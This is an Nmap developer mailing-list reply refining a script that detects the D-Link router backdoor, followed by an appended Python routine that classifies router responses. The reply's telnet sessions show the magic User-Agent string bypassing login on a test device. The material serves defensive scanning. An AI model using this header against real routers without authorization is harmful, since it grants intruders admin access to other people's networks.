Nmap Development mailing list archives
Re: D-Link firmware backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Wed, 16 Oct 2013 13:49:58 +0200
*** Patrik Karlsson wrote:
Please find a script attached to detect the D-Link firmware bypass outlined in this article: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ It's been a while since I committed something, so I will wait for some feedback before I do.
Just a note about...
and server:match("^thttpd%-alphanetworks"))
On some affected devices the server header is 'Server: Alpha_webserv' instead of 'Server: thttpd-alphanetworks/'...
if ( response.status == 200 )
...and there are also some devices which do not send a header at all when this fake user-agent is set. On such devices you could check for the existence of 'self.location.href' after successfully bypassing the login.

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Server: thttpd-alphanetworks/2.23
Content-Type: text/html
Date: Tue, 15 Oct 2013 11:51:23 GMT
Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
Accept-Ranges: bytes
Connection: close
WWW-Authenticate: Basic realm="BRL-04UR"

<HTML><HEAD><TITLE>401 Unauthorized</TITLE>
[...]

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0
User-Agent: xmlset_roodkcableoj28840ybtide

<HTML>
<HEAD>
<TITLE>BRL-04UR</TITLE>
[...]
self.location.href="index1.htm";
[...]

Micha

--
Michael Meyer
OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
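The three device behaviours discussed in this thread (a 200 with Server: thttpd-alphanetworks, a 200 with Server: Alpha_webserv, and a reply with no status line or headers at all that only carries the self.location.href redirect) make the detection verdict more than a status check. The decision logic below is an added example in Python, not Patrik's NSE script and not anything from the Nmap project; the raw replies are constructed from the telnet sessions quoted above, and the function names (parse_response, detect) are my own. It compares the reply to a plain GET with the reply to the probed GET, so a device that never asked for authentication in the first place is not reported as bypassed.

```python
import re

# Constructed sample replies, modelled on the two telnet sessions in the mail
# (first request without the special User-Agent, second with it).
BASELINE_401 = (
    "HTTP/1.0 401 Unauthorized\r\n"
    "Server: thttpd-alphanetworks/2.23\r\n"
    "Content-Type: text/html\r\n"
    'WWW-Authenticate: Basic realm="BRL-04UR"\r\n'
    "\r\n"
    "<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD></HTML>\r\n"
)
# Device that drops the status line and headers once the User-Agent matches.
HEADERLESS_OK = '<HTML>\n<HEAD>\n<TITLE>BRL-04UR</TITLE>\nself.location.href="index1.htm";\n'
# Device that keeps its headers but identifies itself as Alpha_webserv.
ALPHA_OK = ("HTTP/1.0 200 OK\r\nServer: Alpha_webserv\r\n\r\n"
            "<HTML><HEAD><TITLE>BRL-04UR</TITLE></HEAD></HTML>\r\n")

# Both Server banners mentioned in the thread.
AFFECTED_SERVERS = re.compile(r"^(thttpd-alphanetworks|Alpha_webserv)", re.I)


def parse_response(raw):
    """Split a raw HTTP/1.0 reply into (status, headers, body).
    status is None when the reply carries no status line at all."""
    m = re.match(r"HTTP/\d\.\d (\d{3})", raw)
    if not m:
        return None, {}, raw
    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)  # tolerate LF-only devices
    head, body = parts[0], (parts[1] if len(parts) > 1 else "")
    headers = {}
    for line in head.splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(m.group(1)), headers, body


def detect(baseline_raw, probed_raw):
    """Return (affected, reason). baseline_raw is the reply to a plain GET /,
    probed_raw the reply to the same request carrying the backdoor User-Agent."""
    b_status, _, _ = parse_response(baseline_raw)
    p_status, p_headers, p_body = parse_response(probed_raw)
    if b_status != 401:
        return False, "baseline did not require authentication; nothing to bypass"
    server = p_headers.get("server", "")
    if p_status == 200 and AFFECTED_SERVERS.match(server):
        return True, "authentication bypassed (Server: %s)" % server
    if p_status is None and "self.location.href" in p_body:
        return True, "authentication bypassed (headerless reply with redirect)"
    return False, "no bypass indicator"
```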